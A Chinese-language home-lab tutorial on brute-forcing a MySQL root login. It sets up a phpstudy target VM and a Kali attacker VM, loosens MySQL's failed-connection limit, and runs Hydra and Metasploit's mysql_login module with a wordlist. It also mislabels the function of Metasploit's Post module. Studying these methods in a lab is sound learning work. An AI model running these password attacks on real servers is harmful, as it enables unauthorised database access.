環境配置
主機
靶機: 本地Linux服務器虛擬機 + phpstudy
攻擊主機:本地 Kali 虛擬機
配置好網絡讓主機之間相互可以通信
數據庫
數據庫版本:mysql 5.5.62
-
開啟 mysql 遠程連接 ,否則攻擊主機無法建立與靶機數據庫連接
我是直接在小皮面板中開啟
-
修改 mysql 最大錯誤連接數量,默認為 100 ,改為 1000, 方便暴力破解
使用 Hydra 工具進行暴力破解
kali 自帶的 hydra 工具是一款非常強大的暴力破解工具
-
直接輸入hydra 查看一下 hydra 的命令
-l 小寫 指定用戶名 -L 大寫 指定用戶名字典 -p 小寫 指定密碼 -P 大寫 指定密碼字典 -C 指定用戶名:密碼 字典 -M 指定目標ip列表文件 -t 同時運行的線程數
-
使用 hydra 指定密碼字典和 mysql 服務進行攻擊,可以看到爆破成功
hydra -l root -P '密碼字典文件目錄' 目標ip mysql
使用 metsploit 暴力破解
Metasploit是一種安全框架,為滲透測試工程師提供了大量滲透模塊和掃描模塊
基本模塊
基本模塊名 | 功能 |
---|---|
Auxiliary(輔助模塊) | 包含掃描、fuzz測試、拒絕服務攻擊、網絡協議欺騙等程序 |
Exploits(攻擊模塊) | 是一段程序,運行時會利用目標的安全漏洞進行安全測試 |
Payload(攻擊載荷模塊) | 在成功對目標完成一次滲透測試,payload將在目標機器運行,幫助我們獲取目標上需要的訪問和運行權限 |
Post(后滲透模塊) | 通常用來對代碼進行混淆,繞過安全保護機制的檢驗 |
Encoders(編碼模塊) |
基本命令
命令名 | 作用 |
---|---|
use [Auxiliary/Exploit/Payload/Encoder] | 選擇一個指定的模塊並使其開始工作 |
show [exploits/payload/encoder/auxiliary/option] | 顯示可用的特定功能的模塊 |
set [options/payload] | 給某個特定對象賦值 |
setg [options/payload] | 給某個對象賦值的同時設定作用域為全局,在模塊進行切換的時候,該對象的值不會被改變 |
Run | 在設置一個輔助模塊需要的所有選項之后,啟動該輔助模塊 |
exploit | 啟動一個滲透模塊 |
back | 取消當前選擇的模塊並且退回到上一級命令窗口 |
Info | 列出相關模塊的信息 |
Search | 搜索符合條件的特定模塊 |
Session | 列出當前可用的會話 |
use auxiliary/scanner/mysql/mysql_login //使用 mysql 暴力破解模塊
set rhosts 192.168.183.134 //設置目標 ip
set username root //設置用戶名
set pass_file /home/zyw/桌面/FastPwds.txt //指定字典
run //開始爆破
爆破成功